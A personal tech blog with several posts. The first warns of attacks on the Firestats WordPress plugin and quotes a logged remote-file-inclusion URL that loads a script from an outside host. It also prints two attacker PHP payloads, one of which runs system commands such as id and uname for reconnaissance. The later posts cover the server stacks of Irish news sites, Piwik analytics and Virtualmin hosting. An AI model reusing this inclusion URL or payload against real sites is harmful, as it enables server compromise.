tech.sweetnam.eu

The vulnerability described below has been resolved in Firestats 1.6.2 which you can download from http://firestats.cc/wiki/Download

Disclaimer: I have nothing at all to do with the development of Firestats. I am merely an end user.

Over the last few hours I have been watching a major attempt at cracking both of my WordPress installations. A quick investigation tells me that the cracking attempts are looking for this vulnerability in Firestats.

At present there has been over 600 attempts from servers all over the globe which attempt to fetch the path to firestats-wordpress.php and exploit it using a script hosted elsewhere.

A sample from my logs looks like this:

http://tech.sweetnam.eu/tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/board/forum/fx29id.txt??

The scripts themselves seem to have two versions. The most common one like above has the following contents:

<?php /* Fx29ID */ echo(“FeeL”.”CoMz”); die(“FeeL”.”CoMz”); /* Fx29ID */ ?>

The other one contains the following:

<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf(“%d b”, $number); }
if($len >= 4 && $len <=6) {
return sprintf(“%0.2f Kb”, $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf(“%0.2f Mb”, $number/1024/1024); }
return sprintf(“%0.2f Gb”, $number/1024/1024/1024); }

echo “Osirys<br>”;
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo “0sirys was here and also is a fucking gay..<br>”;
echo “uname -a: $un<br>”;
echo “os: $os<br>”;
echo “id: $id1<br>”;
echo “free: $free<br>”;
echo “used: $used<br>”;
echo “total: $all<br>”;
exit;

All I can recommend at the moment is removing firestats from your WordPress installation. It seems to be the only way to be sure for the moment.

Having being obsessed with computers and networks for many years I am always interested to find out the infrastructure behind some of the more popular sites out there. Quite often it is possible to glean bits of information here and there and occasionally an error may occur that offers a glimpse as to what is happening in the back end.

Today it is the turn of the Irish Independent. I got the error pictured here while browsing through their site. What is interesting about it is the domain name; externalcontent.independent.ie. As we can see it is an served by an Apache web server running on a Red Hat machine. However if you look at the error more closely it is a bit more telling.

The server in question (externalcontent.independent.ie) attempted to serve up an ad or content related to  loadzajobs.ie but was unable to contact the back end server. So this tells me that externalcontent.independent.ie is configured as a reverse proxy server and according to Netcraft is located in Ireland.

The primary domain; www.independent.ie, is hosted in the Netherlands and runs Apache Coyote, again according to Netcraft. Apache Coyote is a connector for Apache Tomcat. I find it curious that the main www site is located in the Netherlands but I suspect that it might have something to do with being connected to the Amsterdam Internet Exchange which is largest Internet Exchange in the world.

It does make me wonder why they chose AMS-IX given that here in Ireland we have INEX.

So what about the other national daily online newspapers?

The Irish Times is hosted on Linux and Apache and hosted in Dublin and The Irish Examiner is hosted on Windows Server 2003 and Microsoft IIS/6.

Although there are Irish editions of the Sun, The Star, The Daily Mail and The Mirror, none of them have specific Irish orientated sites but I will include them here nonetheless.

The Sun claims to be hosted on Linux and Apache however they use Akamai for content delivery so this could be inaccurate.

The Daily Star claims to be hosted on an unknown Unix and Apache and the Daily Mirror is hosted on RedHat Linux and Apache.

Finally the Daily Mail, like the Sun also uses Akamai for content delivery and claims to be running Linux and Apache.

It’s clear that Apache and Linux are the front runners.

I have somewhat of an obsession of poring over my logfiles. Whichever PC or laptop I happen to be using at home will always have an ssh session open in the background with a tail of my reverse proxies logs whizzing by. But when it comes to running reports there are plenty of options. Most of which I have used and two days ago I discarded them all for new alternative.

Up until recently I was using both Google Analytics and Woopra. They both pretty much report the same information with just a different look. One issue I noticed with both was performance. Occasionally a page would stall or load slowly while the client connected to one of my sites was waiting to load the script from either Google or Woopra. And as everybody could testify, waiting for a page to load – even if it is just for a couple of seconds – can be frustrating.

In addition to Google Analytics and Woopra I also used AWstats to parse the log file. However that would be fine for one site but when running multiple sites it can become a bit of a pain as each site has its own report. Ideally what I was looking for was something more realtime like Google Google Analytics and Woopra. And what I found was Piwik!

Although it is in early beta it was a doddle to setup. I created a new domain and set it up to accept stats from each of my own sites. Each site gets its own dashboard. Once you setup a site you get a little bit of code to insert somewhere on your pages.

For my WordPress powered sites I did this by simply inseting the script into the themes footer.php and for my primary site powered by MediaWiki it was a similar process. Although once I have everything set up I noticed that there is a WordPress plugin available.

I already mentioned it is in beta so there are a few quirks but overall it is a nice piece of software and is running rather well for me.

Screenshot from Piwik homepage.

When I originally decided to host from home a few years back I had to do more than just decide to fire up a webserver and NAT from my router to it. Choosing an operating system and web server software and application server was another consideration. Did I want to run Linux? Solaris? Microsoft IIS? and did I want to go with PHP or ASP? What was I going to use as a CMS for my primary site and what blog software would suit my requirements?

Ultimately I decided on OpenBSD with Apache and PHP and Windows + IIS. Of course I knew that over time I would be constantly changing this and I needed a way to effictively manage the domains themselves and the sites and database dumps. Obviously I needed a control panel of some sorts and after a bit of investigation I settled on Virtualmin.

Virtualmin is created by the same people who created the excellent and utterly essential Webmin control panel and as such the Virtualmin module integrates nicely into Webmin. Oh, and it’s free!

Originally this site was hosted on Windows Server and IIS and powered by BlogEngine.NET but I found it a bit of a pain to handle two different types of blogging software so I migrated this blog over to WordPress and host it with my other sites. Over time my other server changed several times from OpenBSD to Ubuntu, then Solaris 10 running on a Sun Workstation, back to Ubuntu and currently onto the Debian machine where they currently reside. With Virtualmin moving platforms was a simple matter of restoring from the backups that I took from the machine that was to be replaced.

Of course with it now being relatively trivial to change servers I find myself experimenting a bit more and I’m currently fighting the urge to move everything over to a FreeBSD server but for the moment I’m successfully resisting that urge!